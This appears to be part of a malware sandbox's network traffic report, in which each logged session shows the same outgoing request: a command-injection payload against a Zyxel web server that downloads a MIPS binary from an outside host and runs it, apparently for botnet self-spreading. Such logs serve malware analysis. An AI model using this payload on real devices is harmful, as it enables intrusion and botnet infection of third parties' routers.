                                      Jan 14, 2024 15:50:31.957254887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      698192.168.2.145165044.171.115.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957293034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      699192.168.2.1445446164.159.219.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957330942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      700192.168.2.1457374165.95.56.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957375050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      701192.168.2.1452424107.227.37.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957413912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      702192.168.2.145827889.97.163.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957431078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      703192.168.2.143697878.191.113.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957463980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      704192.168.2.1438012155.154.240.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957530975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      705192.168.2.145235091.80.121.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957583904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      706192.168.2.144292283.152.82.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957613945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      707192.168.2.1434592201.224.72.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957657099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      708192.168.2.1446470133.85.165.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957695007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      709192.168.2.144443254.61.101.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957729101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      710192.168.2.144742249.164.18.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957757950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      711192.168.2.1442810145.251.221.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957801104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      712192.168.2.1447158155.66.189.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957832098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      713192.168.2.1447754182.9.94.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957868099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      714192.168.2.1444488120.106.167.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957914114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      715192.168.2.1454488146.97.158.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957921028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      716192.168.2.1449304107.73.85.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957988977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      717192.168.2.1451526132.219.36.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958019018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      718192.168.2.1443658205.41.81.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958046913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      719192.168.2.1442530105.146.122.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958103895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      720192.168.2.1443202159.118.145.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958152056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      721192.168.2.1437032185.215.230.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958194017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      722192.168.2.14550269.80.29.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958221912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      723192.168.2.1448272130.80.57.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958254099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      724192.168.2.1451246197.248.164.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958286047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      725192.168.2.1453656206.203.33.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958343029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      726192.168.2.1441790171.145.51.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958369970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      727192.168.2.144975424.235.73.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958403111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      728192.168.2.1445010142.83.250.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958445072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      729192.168.2.144657662.210.151.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958467960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      730192.168.2.1435416174.90.135.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958518982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      731192.168.2.1452072133.219.104.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958551884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      732192.168.2.1454538186.152.227.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958580971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      733192.168.2.1436912208.143.4.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958621025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      734192.168.2.145599817.225.255.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958659887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      735192.168.2.1447044111.220.116.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958695889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      736192.168.2.1448244118.12.228.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958728075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      737192.168.2.14417428.63.71.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958770037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      738192.168.2.14557728.222.80.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958782911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      739192.168.2.1454206154.185.131.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958811045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      740192.168.2.1452054202.167.31.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958879948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      741192.168.2.1437404160.241.76.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958909035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      742192.168.2.1447802120.206.200.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958939075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      743192.168.2.1449814149.181.135.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.958996058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      744192.168.2.144537881.67.67.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959033012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      745192.168.2.1450498191.25.162.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959103107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      746192.168.2.144589412.68.29.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959124088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      747192.168.2.1444412210.253.9.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959167004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      748192.168.2.1457746141.191.46.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959206104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      749192.168.2.1457488161.190.254.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959250927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      750192.168.2.145343642.52.94.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959285975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      751192.168.2.145775237.14.114.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959320068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      752192.168.2.1454734142.178.41.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959347963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      753192.168.2.1438526144.36.139.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959407091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      754192.168.2.1435248192.58.80.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959466934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      755192.168.2.1460764164.18.174.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959491014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      756192.168.2.144413857.189.172.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959544897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      757192.168.2.145864097.92.186.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959599972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      758192.168.2.1444024208.113.229.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959619045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      759192.168.2.1448072173.136.68.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959678888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      760192.168.2.1451454120.94.211.90443
                                      TimestampBytes transferredDirectionData
